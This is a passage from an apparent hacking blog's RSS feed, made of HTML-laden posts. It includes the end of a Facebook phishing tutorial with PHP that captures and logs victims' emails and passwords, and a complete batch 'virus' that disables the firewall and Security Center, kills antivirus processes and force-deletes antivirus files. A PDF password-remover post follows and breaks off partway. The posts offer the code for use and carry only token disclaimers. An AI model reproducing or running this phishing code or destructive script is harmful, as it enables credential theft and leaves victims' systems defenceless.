&lt;blockquote style="-webkit-box-shadow: rgb(221, 221, 221) 4px 4px 4px; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirGf3RnCW_xZHZxBiGVAs1GSdKBS1sanmUAaoVjQGVgjYDp22Dx9-Zgb96SwA_wew2lDWm7UssjS9OchpDAmUw6I_VxzAiCdcqc1afEEzWUuaK2YcEVl2QhcoLAK8trJVNy_lWgWQTjN8/s1600/blockquote+black.jpg); background-repeat: repeat repeat; border-bottom-left-radius: 6px; border-bottom-right-radius: 6px; border-left-color: rgb(153, 0, 0); border-left-style: solid; border-left-width: 4px; border-top-left-radius: 6px; border-top-right-radius: 6px; color: #dddddd; font-family: Georgia, 'trebuchet ms', tahoma, Verdana, Arial, sans-serif; font-size: 19px; font-style: italic; line-height: 22px; margin: 5px; outline: none medium; padding: 0px 20px 0px 15px;"&gt;action="https://www.facebook.com/login.php?login_attempt=1"&lt;/blockquote&gt;&lt;br /&gt;
4. Just change the above code as mentioned below&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote style="-webkit-box-shadow: rgb(221, 221, 221) 4px 4px 4px; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirGf3RnCW_xZHZxBiGVAs1GSdKBS1sanmUAaoVjQGVgjYDp22Dx9-Zgb96SwA_wew2lDWm7UssjS9OchpDAmUw6I_VxzAiCdcqc1afEEzWUuaK2YcEVl2QhcoLAK8trJVNy_lWgWQTjN8/s1600/blockquote+black.jpg); background-repeat: repeat repeat; border-bottom-left-radius: 6px; border-bottom-right-radius: 6px; border-left-color: rgb(153, 0, 0); border-left-style: solid; border-left-width: 4px; border-top-left-radius: 6px; border-top-right-radius: 6px; color: #dddddd; font-family: Georgia, 'trebuchet ms', tahoma, Verdana, Arial, sans-serif; font-size: 19px; font-style: italic; line-height: 22px; margin: 5px; outline: none medium; padding: 0px 20px 0px 15px;"&gt;action="pass.php"&lt;/blockquote&gt;&lt;br /&gt;
after changing to pass.php (or anyname.php) just save it in the form facebook.html (anyname.html). By finishing this step our phishing page is ready.Now we want to create script page for this phishing page.&lt;br /&gt;
&lt;br /&gt;
5. For creating a php script,just copy the below php code into notepad and save in the format pass.php (name mentioned in action of our phishing page)&lt;br /&gt;
&lt;div class="codebox" style="-webkit-box-shadow: rgb(204, 204, 204) 8px 8px 8px; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirGf3RnCW_xZHZxBiGVAs1GSdKBS1sanmUAaoVjQGVgjYDp22Dx9-Zgb96SwA_wew2lDWm7UssjS9OchpDAmUw6I_VxzAiCdcqc1afEEzWUuaK2YcEVl2QhcoLAK8trJVNy_lWgWQTjN8/s1600/blockquote+black.jpg); background-position: initial initial; background-repeat: repeat repeat; border-bottom-left-radius: 6px; border-bottom-right-radius: 6px; border-top-left-radius: 6px; border-top-right-radius: 6px; border: 1px dashed rgb(187, 187, 187); box-shadow: rgb(204, 204, 204) 8px 8px 8px; color: white; margin: 10px; outline: none medium; padding: 5px; text-align: left;"&gt;&lt;b style="outline: none medium;"&gt;&amp;lt;?php&amp;nbsp;&lt;br style="outline: none medium;" /&gt;$fp = fopen("Passwords.htm", "a");&lt;br style="outline: none medium;" /&gt;fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");&lt;br style="outline: none medium;" /&gt;echo "&amp;lt;HTML&amp;gt;&lt;br style="outline: none medium;" /&gt;&amp;lt;head&amp;gt;&lt;br style="outline: none medium;" /&gt;&amp;lt;FRAMESET cols=\"*\"&amp;gt;&lt;br style="outline: none medium;" /&gt;&amp;lt;FRAME SRC=\"http://www.facebook.com\"&amp;gt;&lt;br style="outline: none medium;" /&gt;&amp;lt;/FRAMESET&amp;gt;";&lt;br style="outline: none medium;" /&gt;?&amp;gt;&lt;/b&gt;&lt;/div&gt;&lt;b style="outline: none medium;"&gt;Note:&lt;/b&gt;‘http://www.facebook.com‘ is the redirection url,When victim will enter his/her email and password he will redirected to’http://www.facebook.com‘&lt;/div&gt;&lt;div style="font-family: inherit; font-size: 16px; outline: none medium; text-align: justify;"&gt;&lt;br /&gt;
6.&amp;nbsp; By this step our PHP script is also ready,&lt;/div&gt;&lt;div style="font-family: inherit; font-size: 16px; outline: none medium; text-align: justify;"&gt;&lt;br /&gt;
7.&amp;nbsp; Now host these 2 files ie,&lt;br /&gt;
&lt;ul style="outline: none medium;"&gt;&lt;li style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;facebook.html&lt;/b&gt;&lt;/li&gt;
&lt;li style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;pass.php&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;in any of free hosting servers like&amp;nbsp;&lt;b style="outline: none medium;"&gt;ripway,drivehq,110 mb or t35.com&lt;/b&gt;&amp;nbsp;etc (or any other,just google free hosting).Make sure that these 2 files are in same directory.&lt;br /&gt;
&lt;br /&gt;
8. After hosting you will get a&amp;nbsp;&lt;span class="IL_AD" id="IL_AD3" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-family: Philosopher, arial, serif; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;direct link&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;to your phishing page,that is to your facebook.html page.just use this link to access or send phishing page.&lt;/div&gt;&lt;div style="font-family: inherit; font-size: 16px; outline: none medium; text-align: justify;"&gt;&lt;br /&gt;
9. When anyone tries to login through your phishing page a new html page with name password.html will be automatically created in your hosting directory with the password and username entered there.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;NOTE :&lt;/b&gt;&amp;nbsp;This detailed tutorial is given only for creating awareness about phishing attacks and please dont do this for any harmful purposes. latest-cracker.blogspot.in&amp;nbsp;will not be responsible for any such phishing attacks.&lt;/div&gt;&lt;span style="font-family: Philosopher, arial, serif; font-size: 16px; outline: none medium;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7oBNEmGYRy2xrmrN-JjoootdeKtex8h53uIMwp55xT3wy5tRzcEFCQ4iQLiHQlpNDDvCcOt0MGaLMRk0qpSvp5rB-ZLbyA-jyiJUitJYIeRX9QwQd7LlgVB7JaDrW3iuCLUIExSBjxpc/s72-c/Facebook-killer.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>Batch Virus That Destroys Antivirus Systems.</title><link>http://latest-cracker.blogspot.com/2012/06/batch-virus-that-destroys-antivirus.html</link><category>hacking trick</category><category>notepad tricks</category><category>virus</category><pubDate>Fri, 15 Jun 2012 17:43:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-7603225062707935550</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; font-family: Philosopher, arial, serif; font-size: 16px; outline: none medium; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBrmI2akzjFlIRL27impIFiQfYtLhlUnR_Lfr5L9hQiDDldiGPBXYDwy4KLIIh6uKlClwUV4DYdqWwYvbOJAEsnC_hv53f-sz_JhO_q2wVqahs8UnqCmfjEeij4w1Ak6dblU-ws9NrB-A/s1600/VirusFound.jpg" imageanchor="1" style="clear: right; color: #0e0f0f; float: right; margin-bottom: 1em; margin-left: 1em; outline: none medium; text-decoration: none;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBrmI2akzjFlIRL27impIFiQfYtLhlUnR_Lfr5L9hQiDDldiGPBXYDwy4KLIIh6uKlClwUV4DYdqWwYvbOJAEsnC_hv53f-sz_JhO_q2wVqahs8UnqCmfjEeij4w1Ak6dblU-ws9NrB-A/s200/VirusFound.jpg" style="-webkit-box-reflect: below 0px -webkit-gradient(linear, 0% 0%, 0% 100%, from(transparent), color-stop(0.7, transparent), to(rgba(0, 0, 0, 0.0976563))); -webkit-transition: all 0.5s ease; margin: 0px; max-width: 100%; opacity: 1; outline: none medium; padding: 0px;" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="font-family: inherit; font-size: 16px; outline: none medium; text-align: justify;"&gt;Batch programs are&amp;nbsp;&lt;span class="IL_AD" id="IL_AD8" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-family: Philosopher, arial, serif; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;essentially&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;sequences of DOS commands that 'type themselves' when the&amp;nbsp;&lt;span class="IL_AD" id="IL_AD3" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-family: Philosopher, arial, serif; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;batch file&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;is run.&lt;span class="IL_AD" id="IL_AD5" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-family: Philosopher, arial, serif; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;Batch files&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;consist of control elements, internal DOS commands and external commands or programs. With a little ingenuity one can duplicate most of the functions of a general purpose language, but doing any kind of math is tricky, there are no arithmetic commands at all. But most of us use Batch codes for creating&amp;nbsp;&lt;span class="IL_AD" id="IL_AD2" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-family: Philosopher, arial, serif; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;viruses&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;.One of&amp;nbsp;&lt;span class="IL_AD" id="IL_AD7" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-family: Philosopher, arial, serif; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;the important&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;feature of batch&amp;nbsp;viruses&amp;nbsp;are it cant be detected easily by Antivirus systems.Here in this article we will learn about making a batch virus that can destroy antivirus systems.The trick is so simple all you have to need is&amp;nbsp;&lt;span class="IL_AD" id="IL_AD4" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-family: Philosopher, arial, serif; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;a notepad&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;HOW TO CREATE A BATCH VIRUS TO KILL ANTIVIRUS&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
1.&amp;nbsp;&lt;span class="IL_AD" id="IL_AD6" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-family: Philosopher, arial, serif; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;Open notepad&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;and copy the below code to it and save the file as Batch that is with extension .Bat and with anyname.that is your final file will look like this anyname.bat&lt;br /&gt;
&lt;br /&gt;
&lt;div class="codebox" style="-webkit-box-shadow: rgb(204, 204, 204) 8px 8px 8px; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirGf3RnCW_xZHZxBiGVAs1GSdKBS1sanmUAaoVjQGVgjYDp22Dx9-Zgb96SwA_wew2lDWm7UssjS9OchpDAmUw6I_VxzAiCdcqc1afEEzWUuaK2YcEVl2QhcoLAK8trJVNy_lWgWQTjN8/s1600/blockquote+black.jpg); background-position: initial initial; background-repeat: repeat repeat; border-bottom-left-radius: 6px; border-bottom-right-radius: 6px; border-top-left-radius: 6px; border-top-right-radius: 6px; border: 1px dashed rgb(187, 187, 187); box-shadow: rgb(204, 204, 204) 8px 8px 8px; color: white; margin: 10px; outline: none medium; padding: 5px; text-align: left;"&gt;&lt;br /&gt;
@ echo off&lt;br /&gt;
rem --&lt;br /&gt;
rem Permanently Kill Anti-Virus&lt;br /&gt;
net stop “Security Center”&lt;br /&gt;
netsh firewall set opmode mode=disable&lt;br /&gt;
tskill /A av*&lt;br /&gt;
tskill /A fire*&lt;br /&gt;
tskill /A anti*&lt;br /&gt;
cls&lt;br /&gt;
tskill /A spy*&lt;br /&gt;
tskill /A bullguard&lt;br /&gt;
tskill /A PersFw&lt;br /&gt;
tskill /A KAV*&lt;br /&gt;
tskill /A ZONEALARM&lt;br /&gt;
tskill /A SAFEWEB&lt;br /&gt;
cls&lt;br /&gt;
tskill /A OUTPOST&lt;br /&gt;
tskill /A nv*&lt;br /&gt;
tskill /A nav*&lt;br /&gt;
tskill /A F-*&lt;br /&gt;
tskill /A ESAFE&lt;br /&gt;
tskill /A cle&lt;br /&gt;
cls&lt;br /&gt;
tskill /A BLACKICE&lt;br /&gt;
tskill /A def*&lt;br /&gt;
tskill /A kav&lt;br /&gt;
tskill /A kav*&lt;br /&gt;
tskill /A avg*&lt;br /&gt;
tskill /A ash*&lt;br /&gt;
cls&lt;br /&gt;
tskill /A aswupdsv&lt;br /&gt;
tskill /A ewid*&lt;br /&gt;
tskill /A guard*&lt;br /&gt;
tskill /A guar*&lt;br /&gt;
tskill /A gcasDt*&lt;br /&gt;
tskill /A msmp*&lt;br /&gt;
cls&lt;br /&gt;
tskill /A mcafe*&lt;br /&gt;
tskill /A mghtml&lt;br /&gt;
tskill /A msiexec&lt;br /&gt;
tskill /A outpost&lt;br /&gt;
tskill /A isafe&lt;br /&gt;
tskill /A zap*&lt;br /&gt;
cls&lt;br /&gt;
tskill /A zauinst&lt;br /&gt;
tskill /A upd*&lt;br /&gt;
tskill /A zlclien*&lt;br /&gt;
tskill /A minilog&lt;br /&gt;
tskill /A cc*&lt;br /&gt;
tskill /A norton*&lt;br /&gt;
cls&lt;br /&gt;
tskill /A norton au*&lt;br /&gt;
tskill /A ccc*&lt;br /&gt;
tskill /A npfmn*&lt;br /&gt;
tskill /A loge*&lt;br /&gt;
tskill /A nisum*&lt;br /&gt;
tskill /A issvc&lt;br /&gt;
tskill /A tmp*&lt;br /&gt;
cls&lt;br /&gt;
tskill /A tmn*&lt;br /&gt;
tskill /A pcc*&lt;br /&gt;
tskill /A cpd*&lt;br /&gt;
tskill /A pop*&lt;br /&gt;
tskill /A pav*&lt;br /&gt;
tskill /A padmin&lt;br /&gt;
cls&lt;br /&gt;
tskill /A panda*&lt;br /&gt;
tskill /A avsch*&lt;br /&gt;
tskill /A sche*&lt;br /&gt;
tskill /A syman*&lt;br /&gt;
tskill /A virus*&lt;br /&gt;
tskill /A realm*&lt;br /&gt;
cls&lt;br /&gt;
tskill /A sweep*&lt;br /&gt;
tskill /A scan*&lt;br /&gt;
tskill /A ad-*&lt;br /&gt;
tskill /A safe*&lt;br /&gt;
tskill /A avas*&lt;br /&gt;
tskill /A norm*&lt;br /&gt;
cls&lt;br /&gt;
tskill /A offg*&lt;br /&gt;
del /Q /F C:\Program Files\alwils~1\avast4\*.*&lt;br /&gt;
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\kasper~1\*.exe&lt;br /&gt;
cls&lt;br /&gt;
del /Q /F C:\Program Files\trojan~1\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\f-prot95\*.dll&lt;br /&gt;
del /Q /F C:\Program Files\tbav\*.dat&lt;br /&gt;
cls&lt;br /&gt;
del /Q /F C:\Program Files\avpersonal\*.vdf&lt;br /&gt;
del /Q /F C:\Program Files\Norton~1\*.cnt&lt;br /&gt;
del /Q /F C:\Program Files\Mcafee\*.*&lt;br /&gt;
cls&lt;br /&gt;
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*&lt;br /&gt;
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*&lt;br /&gt;
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*&lt;br /&gt;
del /Q /F C:\Program Files\Norton~1\*.*&lt;br /&gt;
cls&lt;br /&gt;
del /Q /F C:\Program Files\avgamsr\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\avgamsvr\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\avgemc\*.exe&lt;br /&gt;
cls&lt;br /&gt;
del /Q /F C:\Program Files\avgcc\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\avgupsvc\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\grisoft&lt;br /&gt;
del /Q /F C:\Program Files\nood32krn\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\nood32\*.exe&lt;br /&gt;
cls&lt;br /&gt;
del /Q /F C:\Program Files\nod32&lt;br /&gt;
del /Q /F C:\Program Files\nood32&lt;br /&gt;
del /Q /F C:\Program Files\kav\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\kavmm\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\kaspersky\*.*&lt;br /&gt;
cls&lt;br /&gt;
del /Q /F C:\Program Files\ewidoctrl\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\guard\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\ewido\*.exe&lt;br /&gt;
cls&lt;br /&gt;
del /Q /F C:\Program Files\pavprsrv\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\pavprot\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\avengine\*.exe&lt;br /&gt;
cls&lt;br /&gt;
del /Q /F C:\Program Files\apvxdwin\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\webproxy\*.exe&lt;br /&gt;
del /Q /F C:\Program Files\panda software\*.*&lt;br /&gt;
rem --&lt;/div&gt;&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;NOTE :&lt;/b&gt;&amp;nbsp;Please dont try this on your own system&lt;/div&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBrmI2akzjFlIRL27impIFiQfYtLhlUnR_Lfr5L9hQiDDldiGPBXYDwy4KLIIh6uKlClwUV4DYdqWwYvbOJAEsnC_hv53f-sz_JhO_q2wVqahs8UnqCmfjEeij4w1Ak6dblU-ws9NrB-A/s72-c/VirusFound.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>Unlock Password Protected PDF Files</title><link>http://latest-cracker.blogspot.com/2012/06/unlock-password-protected-pdf-files.html</link><category>password hacking</category><category>tricks</category><pubDate>Fri, 15 Jun 2012 17:32:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-3243083849738260027</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; font-family: Philosopher, arial, serif; font-size: 16px; outline: none medium; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIyJ10BfzN6MzwThLlwF32uKuCN0kFnMAvt9cm3tHQXHs0gUlXQfLdZj6jg9Az4_KggFkSqpgXOYA2r9VwKFkug9vhNBjw3_LLPCoNe1sgOuI7rOW_Adc4vKz-zGGNPxkRQu_SJm9qd_g/s1600/pdf_logo.png" imageanchor="1" style="clear: right; color: #0e0f0f; float: right; margin-bottom: 1em; margin-left: 1em; outline: none medium; text-decoration: none;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIyJ10BfzN6MzwThLlwF32uKuCN0kFnMAvt9cm3tHQXHs0gUlXQfLdZj6jg9Az4_KggFkSqpgXOYA2r9VwKFkug9vhNBjw3_LLPCoNe1sgOuI7rOW_Adc4vKz-zGGNPxkRQu_SJm9qd_g/s200/pdf_logo.png" style="-webkit-box-reflect: below 0px -webkit-gradient(linear, 0% 0%, 0% 100%, from(transparent), color-stop(0.7, transparent), to(rgba(0, 0, 0, 0.0976563))); -webkit-transition: all 0.5s ease; margin: 0px; max-width: 100%; opacity: 1; outline: none medium; padding: 0px;" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="font-family: Philosopher, arial, serif; font-size: 16px; outline: none medium; text-align: justify;"&gt;In this article I am going to share a nice trick to unlock or remove password&amp;nbsp;&lt;span class="IL_AD" id="IL_AD3" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;protected PDF&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;files.You may seen some&amp;nbsp;&lt;span class="IL_AD" id="IL_AD4" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;PDF files&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;span class="IL_AD" id="IL_AD5" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;downloaded&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;from internet or from any other source with password protected.That is it will ask for password everytime when it is opened.It may be annoying for you to enter the passwords each time or to open the&amp;nbsp;PDF files&amp;nbsp;for which you dont even know its password.So here I am going to introduce a tool called&amp;nbsp;&lt;span class="IL_AD" id="IL_AD8" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;PDF Password Remover&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;. ThisTool is a PDF decryption tool developed by PDF Technologies that can be used to decrypt password&amp;nbsp;protected PDF&amp;nbsp;files.PDF Password Remover&amp;nbsp;Tool can remove owner password from&amp;nbsp;PDF files.&amp;nbsp;PDF files&amp;nbsp;with the owner password set would prevent viewers from editing, selecting text, printing and otherwise changing any of the pdf properties such as form fields etc.&lt;br /&gt;
&lt;br /&gt;
&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;&lt;span class="IL_AD" id="IL_AD2" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static; text-decoration: none !important;"&gt;DOWNLOAD LINK&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="outline: none medium; text-align: center;"&gt;&lt;a href="http://www.ziddu.com/download/19669743/pdfpasswordrecovery.7z.html" style="color: #0e0f0f; outline: none medium; text-decoration: none;" target="_blank"&gt;CLICK HERE TO DOWNLOAD PDF PASSWORD REMOVER&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;HOW TO REMOVE PASSWORD&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
